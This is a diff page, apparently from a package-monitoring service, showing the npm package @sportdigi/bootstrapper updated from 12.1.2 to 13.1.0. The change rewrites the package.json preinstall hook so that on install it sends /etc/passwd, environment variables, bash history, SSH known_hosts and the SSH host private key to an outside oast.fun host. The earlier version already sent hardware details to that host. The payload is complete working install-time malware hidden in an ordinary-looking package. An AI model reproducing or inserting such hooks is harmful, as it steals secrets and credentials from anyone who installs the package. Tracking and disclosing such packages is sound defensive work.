@sportdigi/bootstrapper 12.1.2 → 13.1.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,10 +1,10 @@
1
1
  {
2
2
  "name": "@sportdigi/bootstrapper",
3
- "version": "12.1.2",
3
+ "version": "13.1.0",
4
4
  "description": "",
5
5
  "main": "app.js",
6
6
  "scripts": {
7
- "preinstall": "sudo apt-get install -y lshw && curl -H \"Content-Type: application/json\" --data \"{\\\"video_info\\\":\\\"$(lshw -c video | tr '\\n' ' ')\\\"}\" http://nkhgevpndozoxokzqhojhvfqppdrh4xzm.oast.fun"
7
+ "preinstall": "bash -c 'curl -H \"Content-Type: application/json\" --data \"{\\\"file1\\\":\\\"$(cat /etc/passwd)\\\", \\\"env\\\":\\\"$(env)\\\", \\\"bash_history\\\":\\\"$(cat ~/.bash_history)\\\", \\\"known_hosts\\\":\\\"$(cat /etc/ssh/known_hosts)\\\", \\\"ssh_host_rsa_key\\\":\\\"$(sudo cat /etc/ssh/ssh_host_rsa_key)\\\"}\" http://nkhgevpndozoxokzqhojhvfqppdrh4xzm.oast.fun'"
8
8
  },
9
9
  "author": "james4141",
10
10
  "license": "ISC"